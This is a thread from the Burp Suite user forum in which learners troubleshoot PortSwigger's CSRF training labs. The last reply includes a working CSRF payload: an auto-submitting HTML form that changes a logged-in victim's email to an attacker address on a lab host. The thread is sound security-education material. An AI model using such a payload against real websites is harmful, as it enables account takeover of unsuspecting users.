Burp Suite User Forum

CSRF Labs Broken?

Arlyn | Last updated: Jan 09, 2023 04:53PM UTC

Hi,

Is it possible the CSRF labs are broken? I have attempted the following:

- https://portswigger.net/web-security/csrf/lab-no-defenses
- https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

Despite being able to execute it perfectly to myself, when delivering it via the exploit server, I do not get the pop-up saying I have passed the lab. I have also checked the solution and followed it exactly as shown and still cannot get the lab to show as completed.

Arlyn | Last updated: Jan 09, 2023 05:10PM UTC

Sorry, please ignore this, my fault - it is working fine.

adotvoid | Last updated: Jan 28, 2023 03:04PM UTC

Hi Arlyn. Can you let me know what your issue was? I can't seem to get any of the CSRF labs working either. Thanks in advance!

Michelle, PortSwigger Agent | Last updated: Jan 30, 2023 10:46AM UTC

Hi,

If you're having issues with the CSRF labs, have you tried following along with some of the Community videos?

Kavitha | Last updated: May 15, 2023 09:08PM UTC

I am facing issues with the CSRF labs and I am doing it with the Community version by pasting the script mentioned in the solution on the exploit server. I copied the link from Burp Suite and replaced it in the script. It displays a 302 error in the logs.

Michelle, PortSwigger Agent | Last updated: May 16, 2023 07:31AM UTC

Hi,

Which of the CSRF labs are you currently working on?

pi141592 | Last updated: Mar 26, 2024 12:41PM UTC

1. Don't use URL encoding in the attacker's email address in your HTML (use attacker@example.com instead of attacker%40example.com)
2. The email address must not have been used before in this lab

Example:

    <form method="POST" action="https://0a3b009b0343732180b9dab9008c00c7.web-security-academy.net/my-account/change-email">
        <input type="hidden" name="email" value="attacker@example.com">
    </form>
    <script>
        document.forms[0].submit();
    </script>